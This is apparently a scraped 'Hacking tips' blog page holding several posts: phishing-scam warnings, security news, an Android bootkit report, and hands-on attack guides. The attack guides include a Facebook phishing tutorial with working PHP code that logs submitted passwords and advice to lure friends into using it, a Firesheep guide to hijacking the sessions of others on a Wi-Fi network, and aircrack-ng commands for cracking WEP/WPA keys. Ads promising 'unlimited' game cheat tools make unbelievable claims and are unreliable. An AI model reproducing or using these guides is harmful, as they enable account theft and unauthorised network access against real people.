Showing posts with label Hacking tips. Show all posts

Malaysia flight MH370 found Trick again in Facebook




This is another #Phising trick.

Some sluggish people making this! :p

Firstly RIP to those dumbass...!! :P

But still, some people are becoming goose for those nasty tricks!

If you click on this link,  ==>  http://infinitis.pw/ <== it'll redirect to a page that exactly looks like Facebook login page.
If you type any shit in there, it'll be recorded in LOG file they'd already created. That leads to many critical situation! 

That exactly looks like Image1



You can see that The URL is quite different!

When you type any shit as creditentials and try logging in, you will be redirected to another page. But that page is real and that video too.

That is tubesube.com website.




These type of tricks are growing more and more. I strongly warning all of you not to become dumbs for such things!
Read more

Shocking Video - Flight MH370 Found In Indian Ocean - Facebook Video Scam

The Facebook post below: "[SHOCKING VIDEO]

Flight MH370 FOUND in Indian Ocean!" is another Facebook video survey scam and hoax, which claims that Malaysian Flight MH370 has been found in the Indian Ocean. This scam will trick you into 'liking', sharing or completing surveys, which it claims you have to do in order to watch the video in the post. But, there is no video, so do not be fooled into completing the surveys, liking or sharing it.


"[SHOCKING VIDEO] Flight MH370 FOUND in Indian Ocean!" Scam






They have not found the missing plane of Flight MH370 and the plane in the photo above is not it. The plane is the Lion Air plane that crashed into the sea off Bali in 2013.



What the cybercriminals did was to remove name "Lion", in red writing, from the plane using photoshop or some other image editing software.
Read more

5-year-old Boy discovers Microsoft Xbox Password Bypass vulnerability



A 5-year-old San Diego boy managed to hack one of the most popular gaming systems in the world, Xbox and has now been acknowledged as a security researcher by Microsoft.

Kristoffer Von Hassel uncovered a vulnerability in Xbox Live's password system, that would allow someone to log into a Xbox player's account without their password. Kristoffer's parents noticed he was logging into his father's Xbox Live account simply by tapping the space bar.


Yes, Backdoor entry with just a space bar.

His father noticed that Kristoffer logged in as his Xbox Live account to play video games that he wasn't meant to be playing and asked how he had done it. 

Kristoffer revealed that by typing in the wrong password and then by pressing the spacebar, he bypassed the password verification through a backdoor, and it was pretty simple!

5-year-old gamer actually hacked the authentication system of a multi-billion dollar company, and his feeling "was like yeah!", Kristoffer said to local news station KGTV.



His father reported the vulnerability to Microsoft Security Team, and it has been fixed by them. Microsoft issued a statement, “We're always listening to our customers and thank them for bringing issues to our attention. We take security seriously at Xbox and fixed the issue as soon as we learned about it.”

Microsoft awarded the junior security researcher with some cool games, $50 bugs, a one-year free subscription to Xbox Live and listed his name on their website among other security researchers.

I wish a bright Infosec career ahead of him. Cheers!
Read more

Most Sophisticated Android Bootkit Malware ever Detected; Infected Millions of Devices



Hardly two month ago there's a report about the first widely spread Android Bootkit malware, dubbed as 'Oldboot.A', which infected more than 500,000 Smartphone users worldwide with Android operating system in last eight months, especially in China.

Oldboot is a piece of Android malware that's designed to re-infect Mobile devices even after a thorough cleanup. It resides in the memory of infected devices;  It modify the devices’ boot partition and booting script file to launch system service and extract malicious application during the early stage of system’s booting.

Yet another alarming report about Oldboot malware has been released by the Chinese Security Researchers from '360 Mobile Security'. They have discovered a new variant of the Oldboot family, dubbed as 'Oldboot.B', designed exactly as Oldboot.A, but new variant has advance stealth techniques. Especially, the defense against with antivirus software, malware analyzer, and automatic analysis tools. "The Oldboot Trojan family is the most significant demonstration of this trend." researchers said.

Oldboot.B, Android Bootkit malware has following abilities:

  1. It can install Malicious apps silently in the background
  2. It can inject malicious modules into system process
  3. Prevents malware apps from Uninstalling
  4. Oldboot.B can modify the browser's home page
  5. It has ability to uninstall or disable installed Anti-virus from the device

Infection and Installing more malware apps:

Once an Android device is infected by Oldboot.B trojan, it will listen to the socket continuously and receive and execute commands received from the attacker's command-and-control server.

Malware has some hidden ELF binaries, that includes steganographically encrypted strings, executable codes and configuration file downloaded from C&C server, located at az.o65.org (IP is 61.160.248.67).

After installation, Oldboot Trojan install lots of other malicious android applications or games in the infected device, which are not manually installed by the user.

Malware architecture:

Oldboot.B architecture includes four major Components, those automatically executes during the system startup by registering itself as a service in the init.rc script:


1) Boot_tst:
uses remote injection technique to inject an SO file and a JAR file to the 'system_server' process of the Android system, continuously listen to the socket, and execute commands sent.


2) adb_server:
replaces pm script of Android system with itself and used for anti-uninstallation functionality.


3) meta_chk:
update the configuration file, download and install Android Apps promoted in the background. The Configuration file is encrypted, that greatly increases the time required to analyze.

To evade detection, meta_chk destroys itself from the file system, and left with only the injected process. Android Antivirus software does not support the process memory scan in the Android platform, so they cannot detect or delete the Oldboot Trojan which resides in the memor.


4) agentsysline:
module written in C++ programming language, run as a daemon in the background to receive commands from command-and-control server. This component can uninstall anti-virus software, delete the specific files and enable or disable network connection etc.


Problems for Security researches:

To increase the problem of malware analyzers:
  1. It add some meaningless code and trigger some behaviour randomly
  2. Check for Sim card availability in the device, and will not perform certain behaviour if there is no Sim card available to fool the sandbox and emulators
  3. Check for the existence of antivirus software, and may uninstall the anti-virus software before doing anything malicious.
Malware uses the steganography techniques to hide its configuration file into images:



"But after some analysis, we found that the configuration of meta_chk is hidden in this picture, which contains the command will be executed by meta_chk and other information." researchers said. The size of this configuration file is 12,508 bytes.

"Depending on the commands sent from the C&C server, it can do many different things, such as sending fake SMS messages or phishing attacks, and so on. Driven by profit, the Oldboot Trojan family changes very fast to react to any situation."

Oldboot.B is one of the most advanced Android malware that is very difficult to remove, but antivirus firm 360 Mobile Security also released Oldboot detection and removing tool for free, you can download it from their website.

To avoid infection, Smartphones users should only install apps from trusted stores; make sure the Android system setting 'Unknown sources' is unchecked to prevent dropped or drive-by-download app installs; don't use untrusted custom ROMs and install a mobile security app.
Read more

Syrian Electronic Army gather evidence that Microsoft selling your information to FBI

A document recently leaked by Syrian Electronic Army shows that Microsoft is charging FBI secret division to legally view customer information.  The documents are said to have been taken from Microsoft.

Syrian Electronic Army(SEA) is known for hacking social media accounts and websites of top organizations including Microsoft, CNN, Daily dot and more.

SEA allowed the Daily Dot to analyze the documents before they published in full.

The document is said to be containing emails and invoices between Microsoft's Global Criminal Compliance team and the FBI's Digital Intercept Technology Unit (DITU).


the documents shows that Microsoft charged FBI $145,100 in December 2012, broken down to $100 per request for information.  But in 2013, Microsoft allegedly doubled the amount, charged FBI $200 per request for a total of $352,200.  For the recent invoice(Nov 2013), they charged $281,000.


The information provided to FBI including Live email ID, PUID, name, address, country, IP address, Date of Registration and few other details.


Here is the screenshot of documents:








Read more

How to Hack Facebook,Twitter,Gmail accounts using Wi-Fi?

Mozilla add on namely " FireSheep" is used for hack thousands of email accounts . As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly  within 24 hours.



What is special in FireSheep?

Using FireSheep add on you can control any account without knowing the username and password . The Social Network giant Facebook is victim of this Firesheep.


How?
The Firesheep uses HTTP Session Hijacking to  gain the username and password.

What is HTTP Session Hijacking?
Attacker use HTTP session Hijacking to steal the cookies from victim.  Cookies are file which contains the password and username .


Using this HTTP Session Hijacking method you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account.

How to use this Firesheep to steal the cookies??
You will need this Requirements:




STEP-1:
Download the Firesheep file.
Right click on the file and select "Open With"
and select Mozila Firefox.

STEP-2:
Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep

STEP-3:
Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly


NOTE:

This tutorial is only for Educational Purpose.
Read more

Hacking Facebook passwords-Facebook Bruteforcer softwares[for n00b]

 Are you searching for Facebook or gmail Hacking Software?  if your answer is yes,  you come to the right place.

You may read  somewhere else as "use this hacking software to hack facebook accounts". And some hacking blogs has some post like this with procedure:



Download this software
Run the application.
Enter your email id and password
Enter your victim email id.
That's all your friend account is hacked.


Some hacking bloggers also mentioned Bruteforcer for Facebook.  if you enter the email id, it will hack the email. 


First of all , let me ask one question " Do you think facebook is f****ng stupids?"  .  Do you think it is possible to hack any accounts within a minute using these kind of softwares?(Innocence).

The truth is that you are being hacked.  You realized that?

Don't be a n00b, think like a Security Expert.

Then what is Facebook hacking softwares?


There is no Such software that will hack Facebook accounts , if you give email id simply.  They are fake softwares.


What is the Aim of these Kind of Hacking Facebook password softwares?



This kind of fake softwares are created by Hackers to trick n00b hackers.  If the n00b download and run the application, it may launch some malicious programs (spyware,trojans,..).    

Trojans leads to dead of your computer.  But most of hackers won't do this stupid thing.  They use spyware to steal your confidential data instead.


n00b: gadget.controller. you are right, my system is infected by some kind of spyware.
Gadget.controller: that's what i said.
 n00b: but  how hackers hack Facebook account passwords?
Gadget.controller: There are some other ways to hack the Facebook passwords. Let me explain what they are.

Method-1: Phishing webpage


Phishing webpage is traditional way of hacking accounts.  Old is Gold!!  Learn about Phishing now!

Phishing webpage is a fake webpage of the target website that helps hackers to lure the victim into believe that they are visiting the legitimate website. 

Let me explain how to create a facebook phishing .

STEP-1:
Go to facebook and right click on website .  Select "View source" and copy the code to notepad.

STEP-2:
Now search (Press ctrl +f) for keyword "action"  in that code.

You fill find the code like this:



Here, let me explain what "action" means to.  If you have some basic knowledge of web applications, then you already know about that.  'Action' is a HTML attribute that specifies where to send the form-data when a form is submitted.

In the above code, the action attribute has the value that points to facebook login php file (https://login.facebook.com/login.php).  So when a user click the login button, it will send the data to the login.php page. This php file will check whether the entered password is valid or not .

To capture the form-data, we have to change the action value to our php file. So let us change the value to ' action="login.php" '.  Note: I've removed ' http://login.facebook.com/' from the value.

Save the file as index.html.

STEP-3:
Now , let us create our own login.php file that will capture the entered data and redirects to original facebook page.
Open the notepad and type the following code:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>



Save this file as "login.php"

STEP-4:
Open the notepad and just save the file as "pswrds.txt" (without any contents).

STEP-5:
To host your phishing page, you may need a webhosting.  You can create a free account in free web hosting providers. Once you have created account in free hosting site, you can host your files and run.  Also, your files can be viewed by visiting a specific URL provided when you create account. For example : 'your_url_name.webhosting_domain.com'.

Now upload those files(index.html,login.php,pswrds.txt) in the free Web hosting site. Make sure your fake page is working or not by vising your url. 


Now , You have to lure your friends into login into your phishing page. Once they login into the page, you can see the login credentials being stored in the "pswrds.txt" file.


NOTE:

The above article is for educational purpose only, written for beginners of Ethical hacking or Pentesting to understand the basics so that it will be easy for them to understanding advanced topics.


METHOD-2: Keyloggers


Keylogger is spyware that will capture each key strokes in keyboard.  So , if the victim type the id and passwords, it will be captured and mailed to you.
Read more

HACKING

What is Computer Hacking?

In a cyber security world, the person who is able to discover weakness in a system and managed to exploit it to accomplish his goal referred as a Hacker , and the process is referred as Hacking.

Now a days,  People started think that hacking is only hijacking Facebook accounts or defacing websites.  Yes, it is also part of hacking field but it doesn't mean that it is the main part of hacking.

So what is exactly hacking, what should i do to become a hacker?!  Don't worry, you will learn it from Break The Security. The main thing you need to become a hacker is self-interest.  You should always ready to learn something and learn to create something new. 

Now , let me explain about different kind of hackers exist in the cyber security world..!


Script Kiddie:

Script Kiddies are the persons who use tools , scripts, methods and programs created by real hackers.  In a simple word, the one who doesn't know how a system works but still able to exploit it with previously available tools.

White Hat Hacker:

White Hat hackers are good guys who does the hacking for defensing.  The main aim of a Whitehat hacker is to improve the security of a system by finding security flaws and fixing it.  They work for an organization or individually to make the cyber space more secure.

Gadget controller only concentrates on white-hat hacking and help you to learn the Ethical Hacking world.

Black Hat Hacker:

BlackHat hackers are really bad guys , cyber criminals , who have malicious intent.  The hackers who steal money, infect systems with malware,  etc are referred as BlackHat hackers.  They use their hacking skills for illegal purposes.

Grey Hat Hacker:

The hackers who may work offensively or defensively, depending on the situation. Hackers who don't have malicious intentions but still like to break into third-party system for fun or just for showing the existence of vulnerability.

Hacktivists:

The hackers who use their hacking skills for protesting against injustice and attack a target system and websites to bring the justice.  One of the popular hacktivists is Anonymous and RedHack.
Read more

Crime City Hack Cheat Tool



Today we introduce to you the 100% working Crime City Cheats and Hack which add unlimited gold, money, steel and respect to your facebook application in just one second. All you need to do is just to login and press activate hack. We guarantee you that you will be one of the best Crime City player after use this amazing tool.
The Crime City Hack User-Interface is made by our professional designer and it`s really easy to use it.

Features:

| Add Unlimited Crime City Money Hack
| Add Unlimited Crime City Steel Hack
| Add Unlimited Crime City Gold Hack
| Add Unlimited Crime City Respect Hack
| Energy Refill Extra Option


Read more

Pirates of the Caribbean: Isles of War Hack/Cheat Tool



Still finding the hack tool for the Pirates of the Caribbean: Isles of War ? Now you can download the Pirates of the Caribbean: Isles of War Hack/Cheat Tool in just seconds.

Pirates of the Caribbean: Isles of War Hack Features:


| Add Unlimited Gold
| Add Unlimited Lumber
| Add Unlimited Iron
| Add Unlimited Silk
| Add Unlimited Gems
| Add Unlimited XP


Read more

Big Time Gangsta Hack Tool - Cheat - Android and iOS




Big Time Gangsta Hack Features:


| Add Unlimited Glu Credits / Cred
| Add Unlimited Green
| Add Unlimited Experience
| Enable VIP Gold
| Undetectable (100% Guaranteed)
| Simple and accessible design for users. (Plug and Play)
| Works for all Android phones or tablets, and iOS Devices including iPhone, iPad, iPad Mini, and iPod Touch
| Automatic updates to ensure the hack works fine.


Read more

Pool Live Tour Hack Tool v3.1 (2014)




We present the latest hack to play Pool Live Tour.
Our tool was coded and developed by Keygen & Hack team , we are permanently updating this tool and fixing bugs or glitches that occurs during players experience, we try to be professionals and keep this tool updated and working all the time.
In the latest version we have added a few new things so that
latest version is more stable. Pool Live Tour Hack v 3.1 provides you unlimited number of victories and unlimited number of coins. For proper operation of the program is required. NET 4.0 which you can download from the Microsoft website. To connect with the game Pool Live Tour Hack uses a proxy server, so that the connection is secure and anonymous.
Proxy servers also eliminate the risk of ban in the game.





Read more

HOW TO HACK WEP and WPA2 NETWORKS (LINUX)



hopefully installed the Aircrack-ng suite and familiarized yourself with some basic Linux commands, we can start cracking WEP and WPA1/2 networks to see the differences in security Wired Equivalent Privacy (WEP) and Wi-fi Protected Access (WPA) provide. 

Notice: This is for educational purposes Only, do not attempt this on a network you do not PERSONALLY own. If you do this on a public or private network that you do not have authorization to do so on, it is illegal and you will probably get caught. ANDROCOMP OR ANSVENTURE IS NOT RESPONSIBLE

Now, lets start. Open up a new terminal and lets begin (all typed commands are underlined; read the notes section for optional commands):
 


  1. Make sure you have a "monitoring" interface, this means that your network interface (the thing that interacts with networks) can scan for open/encrypted networks.
    To check what interfaces you have, type "iwconfig" into your terminal and it will list out which interfaces are currently up, and which mode they are in (look for "mode: managed" or "mode: monitor").
     
    Type:
     
    airmon-ng start [interface] 
    if your interface is in "managed" or any other mode (ad-hoc, etc) it needs to be switched into monitor mode. Sometimes it will create a new interface for the monitoring, for example, my wireless is "wlan0" and it creates "wlan0mon" or "mon0" for monitoring.
    Once it is in "monitor" mode, you can begin.
     
  2. Make sure you can inject packets into the chosen network (find a network with Kismet (I'll review Kismet later) or your network manager (either Wicd, or network-manager), or with the "airodump-ng [interface]" command in a new terminal. This creates a new .cap file, though).
    Type:
     
    aireplay-ng -9 -e [network name] -a [your MAC address] [interface] 
    This makes sure that you can use your network card to input packets (data) into the targeted network. Your NIC (network interface card) must support injection.
     
  3. If you can inject, start dumping captured IVs (Initialization Vectors) into a .cap (capture) file with command: 
    airodump-ng (-c x) --bssid [target network MAC] -w [output prefix] [interface] 
    Note: -c x is channel x, where x is 1-11 and not necessary, although, if you know the channel, I would suggest doing the correct channel.
    This will bring up a nice interface with your targeted network, the BSSID (MAC that you entered), the "PWR," or how close you are (lower is better!), the "Beacons," which networks send automatically, the #Data, which is the data packets that have been sent over the network (which you have just started capturing!), the #/s which is data packets/s (higher is better for capturing faster!), the "CH," or channel (I'll go over this later), the "MB," the "ENC," or encryption (WEP/WPA/OPEN), the CIPHER (related to the ENC), the AUTH (pass-key or other), and finally the ESSID which is the English or ASCII network name that humans understand more easily than a Hex BSSID.
     
  4. Now we have to do a "fake authentication" on the network.  This is pretty self explanatory, but it authenticates you with the access point. If you didn't run this, the access point would return "deauthenticated" packets, not allowing you to inject packets back into the system. 
    Type:
     
    aireplay-ng -1 0 -e [network name] -a [target network MAC] -h [your MAC address] [interface] 
    It should respond "Association successful :-)" if not, try again until it works.
    This may take a while, so don't fret if it doesn't work right away. I've had to do this three or four times or more with new terminals and locations until I finally got it, it's just luck sometimes.
     
  5. Reinject ARP (Address Resolution Protocol) packets back into the network to create network activity, What we're basically doing is sending fake messages to create data packets on the network so we can record and crack their password! 
    Type:
     
    aireplay-ng -3 -b [target network MAC] -h [your MAC address] [interface] 
    It should say "Read xxxx packets (got xxxx ARP requests), sent xxxx packets..." and network activity should increase.
     
  6. Crack the WEP key! Type: 
    aircrack-ng -b [target network MAC] *.cap 
    Note: you can enter the ACTUAL file name instead of "*.cap" if you know it, or whatever "output prefix" you entered, then *.cap (all in a line, since it concatinates -xxxxx_xxxx after the prefix and before .cap).
     
  7. Crack the WPA/WPA2 key (if you're not cracking WEP)! Type: 
    aircrack-ng -w [password list] -b [target network MAC] *.cap 
    Note: You must have captured the WPA handshake, and again, substitute your capture file accordingly.
For WEP cracking, this should run a terminal with "Tested xxxx keys (got xxxx IVs) and a bunch of gibberish HEX underneath. You can run this while you inject packets. It should find the key eventually unless the network admin or creator disconnects the network or you go out of range of it. Sometimes it only takes as little as 5000 keys, and other times 250,000 keys.
My record is about 2-3 minutes while sitting on a toilet in a flea market; it's fun to see how quickly WEP is broken, so remember ALWAYS use WPA2 with a non-dictionary passkey.
For WPA cracking, it runs through a list of passwords (in Backtrack 5 there is a darkc0de.lst with almost a million, if not more, passwords) and checks every one for a match; thus taking quite a bit longer, and if the password is not in the list, impossible to crack through this method.

The aircrack-ng suite includes the below programs, try playing around with them. If you enter the name then --help or -h, usually (almost always) a help page appears with all the commands you can enter.

Name     ---     What program does

aircrack-ng     Cracks WEP and WPA (Dictionary attack) keys.
airdecap-ng     Decrypts WEP or WPA encrypted capture files with known key.
airmon-ng     Placing different cards in monitor mode.
aireplay-ng     Packet injector (Linux, and Windows [with Commview drivers]).
airodump-ng     Packet sniffer: Places air traffic into PCAP or IVS files and shows information about networks.
airtun-ng     Virtual tunnel interface creator.
airolib-ng     Stores and manages ESSID and password lists; Increases the KPS of WPA attacks
packetforge-ng     Create encrypted packets for injection.
Tools         Tools to merge and convert.
airbase-ng     Incorporates techniques for attacking client, as opposed to Access Points
airdecloak-ng     removes WEP cloaking from pcap files
airdriver-ng     Tools for managing wireless drivers
airolib-ng     stores and manages ESSID and password lists and compute Pairwise Master Keys
airserv-ng     allows you to access the wireless card from other computers.
buddy-ng     the helper server for easside-ng, run on a remote computer
easside-ng     a tool for communicating to an access point, without the WEP key
tkiptun-ng     WPA/TKIP attack
wesside-ng     automatic tool for recovering wep key.


Read more